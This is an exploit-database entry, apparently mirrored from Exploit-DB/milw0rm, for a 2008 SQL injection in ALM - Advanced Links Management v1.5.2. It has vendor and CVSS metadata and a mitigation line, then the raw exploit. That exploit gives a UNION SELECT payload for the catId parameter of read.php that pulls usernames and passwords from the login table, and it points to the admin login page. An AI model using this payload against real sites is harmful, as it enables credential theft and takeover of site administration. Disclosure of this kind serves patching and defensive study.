ALM - Advanced Links Management remote SQL injection exploit

vendor:

ALM - Advanced Links Management

by:

His0k4

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ALM - Advanced Links Management

Affected Version From: 1.5.2002

Affected Version To: 1.5.2002

Patch Exists: YES

Related CWE: N/A

CPE: a:easy-script:alm

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ALM – Advanced Links Management remote SQL injection exploit

A remote SQL injection vulnerability exists in ALM - Advanced Links Management v1.5.2. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable script read.php, which can be used to extract sensitive information from the database, modify data, or execute system commands.

Mitigation:

Upgrade to the latest version of ALM - Advanced Links Management

Source

Exploit-DB raw data:

###################################################
[~] ALM - Advanced Links Management remote SQL injection exploit
[~] Script download : http://www.easy-script.com/scripts-dl/alm_v152.zip                                                                                                            
[~] Founder: His0k4 { ALGERIAN HACKER }
[~] Greetz : All friends & muslims HaCkErS...
[~] Contact: His0k4.hlm[at]gmail.com
[~] P.O.C :
---------------------
http://localhost/[script_path]/read.php?catId={SQL}
[~] Exemple :
http://localhost/[script_path]/read.php?catId=-1 UNION SELECT 1,concat(username,0x3a,password) FROM login--
---------------------
[~] Note:
    Admin login:  http://localhost/[script_path]/admin
---------------------
###############################################

# milw0rm.com [2008-05-10]